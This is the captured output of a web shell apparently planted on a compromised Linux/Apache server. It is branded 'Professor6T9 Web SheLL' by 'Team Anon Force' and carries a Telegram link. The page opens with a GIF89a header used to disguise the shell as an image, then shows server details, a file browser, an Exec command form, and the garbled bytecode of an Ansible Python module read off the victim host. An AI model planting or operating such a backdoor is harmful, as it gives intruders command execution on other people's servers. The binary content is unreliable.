GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
lib
/
python3
/
dist-packages
/
ansible
/
module_utils
/
__pycache__
[ HOME ]
Exec
Submit
File Name : api.cpython-310.pyc
o ��t`e � @ sb d Z ddlmZmZmZ eZddlZddlZddd�Z ddd�Z ddd �Zdd d�Zdd d�Z dS )a� This module adds shared support for generic api modules In order to use this module, include it as part of a custom module as shown below. The 'api' module provides the following common argument specs: * rate limit spec - rate: number of requests per time unit (int) - rate_limit: time window in which the limit is applied in seconds * retry spec - retries: number of attempts - retry_pause: delay between attempts in seconds � )�absolute_import�division�print_functionNc C s* t t dd�t dd�d�}| r|�| � |S )z7Creates an argument spec for working with rate limiting�int��type)�rate� rate_limit��dict�update��specZarg_spec� r �:/usr/lib/python3/dist-packages/ansible/module_utils/api.py�rate_limit_argument_spec! s � r c C s, t t dd�t ddd�d�}| r|�| � |S )z2Creates an argument spec for working with retryingr r �float� �r �default��retries�retry_pauser r r r r �retry_argument_spec, s � r c C s>